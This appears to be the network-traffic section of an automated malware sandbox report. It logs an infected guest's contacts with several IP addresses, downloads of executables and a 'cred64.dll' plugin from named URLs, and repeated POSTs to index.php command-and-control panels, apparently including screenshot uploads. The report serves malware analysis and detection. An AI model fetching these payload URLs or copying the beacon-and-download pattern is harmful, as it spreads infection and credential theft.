Network Analysis
IP Address | Status | Action |
---|---|---|
144.76.136.153 | Active | Moloch |
148.251.234.83 | Active | Moloch |
149.28.253.196 | Active | Moloch |
164.124.101.2 | Active | Moloch |
185.106.92.214 | Active | Moloch |
23.160.193.16 | Active | Moloch |
31.41.244.14 | Active | Moloch |
31.41.244.188 | Active | Moloch |
31.41.244.237 | Active | Moloch |
31.41.244.253 | Active | Moloch |
62.204.41.6 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
iplogger.org | 148.251.234.83 | |
transfer.sh | 144.76.136.153 | |
www.aculpainting.com | 23.160.193.16 | |
www.icodeps.com | 149.28.253.196 | |
TCP Requests

Source | Destination | Name |
---|---|---|
192.168.56.103:49209 | 144.76.136.153:80 | transfer.sh |
192.168.56.103:49210 | 144.76.136.153:443 | transfer.sh |
192.168.56.103:49211 | 144.76.136.153:443 | transfer.sh |
192.168.56.103:49212 | 144.76.136.153:443 | transfer.sh |
192.168.56.103:49214 | 144.76.136.153:443 | transfer.sh |
192.168.56.103:49215 | 144.76.136.153:443 | transfer.sh |
192.168.56.103:49216 | 144.76.136.153:443 | transfer.sh |
192.168.56.103:49225 | 144.76.136.153:443 | transfer.sh |
192.168.56.103:49226 | 144.76.136.153:443 | transfer.sh |
192.168.56.103:49228 | 144.76.136.153:443 | transfer.sh |
192.168.56.103:49197 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49198 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49199 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49196 | 149.28.253.196:443 | www.icodeps.com |
185.106.92.214:2515 | 192.168.56.103:49186 | |
192.168.56.103:49193 | 23.160.193.16:80 | www.aculpainting.com |
192.168.56.103:49182 | 31.41.244.14:4683 | |
192.168.56.103:49184 | 31.41.244.188:80 | |
192.168.56.103:49171 | 31.41.244.237:80 | |
192.168.56.103:49172 | 31.41.244.237:80 | |
192.168.56.103:49179 | 31.41.244.237:80 | |
192.168.56.103:49173 | 31.41.244.253:80 | |
192.168.56.103:49180 | 31.41.244.253:80 | |
192.168.56.103:49187 | 62.204.41.6:80 | |
192.168.56.103:49190 | 62.204.41.6:80 | |
192.168.56.103:49191 | 62.204.41.6:80 | |
192.168.56.103:49231 | 31.41.244.14:4683 | |
192.168.56.103:49223 | 31.41.244.237:80 | |
192.168.56.103:49203 | 31.41.244.253:80 | |
192.168.56.103:49233 | 62.204.41.6:80 | |
UDP Requests

Source | Destination |
---|---|
192.168.56.103:50800 | 164.124.101.2:53 |
192.168.56.103:52760 | 164.124.101.2:53 |
192.168.56.103:53673 | 164.124.101.2:53 |
192.168.56.103:64894 | 164.124.101.2:53 |
192.168.56.103:137 | 192.168.56.255:137 |
192.168.56.103:138 | 192.168.56.255:138 |
192.168.56.103:49154 | 239.255.255.250:1900 |
8.8.8.8:53 | 192.168.56.103:53673 |
GET 200 https://www.icodeps.com/
```http
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.icodeps.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Dec 2022 01:51:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Access-Control-Allow-Origin: *
```
POST 200 http://31.41.244.237/jg94cVd30f/index.php
```http
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 90
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```
POST 200 http://31.41.244.237/jg94cVd30f/index.php?scr=1
```http
POST /jg94cVd30f/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODcwNDA=
Host: 31.41.244.237
Content-Length: 87192
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```
GET 200 http://31.41.244.253/new/linda5.exe
```http
GET /new/linda5.exe HTTP/1.1
Host: 31.41.244.253

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:52 GMT
Content-Type: application/octet-stream
Content-Length: 1570725
Last-Modified: Thu, 08 Dec 2022 01:32:36 GMT
Connection: keep-alive
ETag: "63913eb4-17f7a5"
Accept-Ranges: bytes
```
POST 200 http://31.41.244.237/jg94cVd30f/index.php
```http
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```
GET 200 http://31.41.244.253/goga/nash.exe
```http
GET /goga/nash.exe HTTP/1.1
Host: 31.41.244.253

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:59 GMT
Content-Type: application/octet-stream
Content-Length: 179200
Last-Modified: Mon, 05 Dec 2022 21:37:49 GMT
Connection: keep-alive
ETag: "638e64ad-2bc00"
Accept-Ranges: bytes
```
POST 200 http://31.41.244.237/jg94cVd30f/index.php
```http
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```
GET 200 http://31.41.244.188/ano/anon.exe
```http
GET /ano/anon.exe HTTP/1.1
Host: 31.41.244.188

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:06 GMT
Content-Type: application/octet-stream
Content-Length: 179200
Last-Modified: Thu, 08 Dec 2022 00:06:32 GMT
Connection: keep-alive
ETag: "63912a88-2bc00"
Accept-Ranges: bytes
```
POST 200 http://31.41.244.237/jg94cVd30f/index.php
```http
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```
GET 200 http://62.204.41.6/newlege.exe
```http
GET /newlege.exe HTTP/1.1
Host: 62.204.41.6

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:12 GMT
Content-Type: application/octet-stream
Content-Length: 247296
Connection: keep-alive
Last-Modified: Sat, 03 Dec 2022 14:17:36 GMT
ETag: "3c600-5eeed1dac336b"
Accept-Ranges: bytes
```
POST 200 http://62.204.41.6/p9cWxH/index.php
```http
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 90
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
```
POST 200 http://62.204.41.6/p9cWxH/index.php?scr=1
```http
POST /p9cWxH/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODkyNDM=
Host: 62.204.41.6
Content-Length: 89395
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:16 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
```
GET 302 http://www.aculpainting.com/mp3studios97/mp3studios_97.exe
```http
GET /mp3studios97/mp3studios_97.exe HTTP/1.1
Host: www.aculpainting.com

HTTP/1.1 302 Found
Server: nginx
Date: Thu, 08 Dec 2022 01:51:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Location: http://www.aculpainting.com/mp3studios_97.exe
```
GET 200 http://www.aculpainting.com/mp3studios_97.exe
```http
GET /mp3studios_97.exe HTTP/1.1
Host: www.aculpainting.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Dec 2022 01:51:14 GMT
Content-Type: application/octet-stream
Content-Length: 1493504
Last-Modified: Tue, 06 Dec 2022 06:13:00 GMT
Connection: keep-alive
ETag: "638edd6c-16ca00"
Accept-Ranges: bytes
```
POST 200 http://31.41.244.237/jg94cVd30f/index.php
```http
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```
POST 200 http://62.204.41.6/p9cWxH/index.php
```http
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:21 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
```
GET 304 http://31.41.244.253/new/linda5.exe
```http
GET /new/linda5.exe HTTP/1.1
Host: 31.41.244.253
If-Modified-Since: Thu, 08 Dec 2022 01:32:36 GMT
If-None-Match: "63913eb4-17f7a5"

HTTP/1.1 304 Not Modified
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:22 GMT
Last-Modified: Thu, 08 Dec 2022 01:32:36 GMT
Connection: keep-alive
ETag: "63913eb4-17f7a5"
```
POST 200 http://62.204.41.6/p9cWxH/index.php
```http
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:27 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
```
GET 301 http://transfer.sh/get/gI6LT0/loader.exe
```http
GET /get/gI6LT0/loader.exe HTTP/1.1
Host: transfer.sh

HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0
Date: Thu, 08 Dec 2022 01:51:28 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://transfer.sh/get/gI6LT0/loader.exe
```
GET 301 http://transfer.sh/get/gI6LT0/loader.exe
```http
GET /get/gI6LT0/loader.exe HTTP/1.1
Host: transfer.sh

HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0
Date: Thu, 08 Dec 2022 01:51:36 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://transfer.sh/get/gI6LT0/loader.exe
```
GET 200 http://31.41.244.237/jg94cVd30f/Plugins/cred64.dll
```http
GET /jg94cVd30f/Plugins/cred64.dll HTTP/1.1
Host: 31.41.244.237

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:42 GMT
Content-Type: application/octet-stream
Content-Length: 129024
Last-Modified: Wed, 07 Dec 2022 14:45:28 GMT
Connection: keep-alive
ETag: "6390a708-1f800"
Accept-Ranges: bytes
```
POST 200 http://31.41.244.237/jg94cVd30f/index.php
```http
POST /jg94cVd30f/index.php HTTP/1.1
Host: 31.41.244.237
Content-Length: 21
Content-Type: application/x-www-form-urlencoded

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
```
GET 301 http://transfer.sh/get/gI6LT0/loader.exe
```http
GET /get/gI6LT0/loader.exe HTTP/1.1
Host: transfer.sh

HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0
Date: Thu, 08 Dec 2022 01:51:43 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://transfer.sh/get/gI6LT0/loader.exe
```
POST 200 http://62.204.41.6/p9cWxH/index.php
```http
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:50 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
```
GET 200 http://31.41.244.253/miha/wish.exe
```http
GET /miha/wish.exe HTTP/1.1
Host: 31.41.244.253

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:50 GMT
Content-Type: application/octet-stream
Content-Length: 179200
Last-Modified: Mon, 05 Dec 2022 21:37:33 GMT
Connection: keep-alive
ETag: "638e649d-2bc00"
Accept-Ranges: bytes
```
POST 200 http://62.204.41.6/p9cWxH/index.php
```http
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:56 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
```
GET 200 http://62.204.41.6/p9cWxH/Plugins/cred64.dll
```http
GET /p9cWxH/Plugins/cred64.dll HTTP/1.1
Host: 62.204.41.6

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:52:03 GMT
Content-Type: application/octet-stream
Content-Length: 129024
Connection: keep-alive
Last-Modified: Sat, 03 Dec 2022 13:47:00 GMT
ETag: "1f800-5eeecb04a4ba8"
Accept-Ranges: bytes
```
POST 200 http://62.204.41.6/p9cWxH/index.php
```http
POST /p9cWxH/index.php HTTP/1.1
Host: 62.204.41.6
Content-Length: 21
Content-Type: application/x-www-form-urlencoded

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:52:05 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Refresh: 0; url = Login.php
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49196 149.28.253.196:443 | C=CN, O=TrustAsia Technologies, Inc., CN=TrustAsia RSA DV TLS CA G2 | CN=icodeps.com | 87:db:69:7b:62:f3:12:4a:c6:40:1e:05:07:04:95:6d:41:8c:f8:26 |
Snort Alerts
No Snort Alerts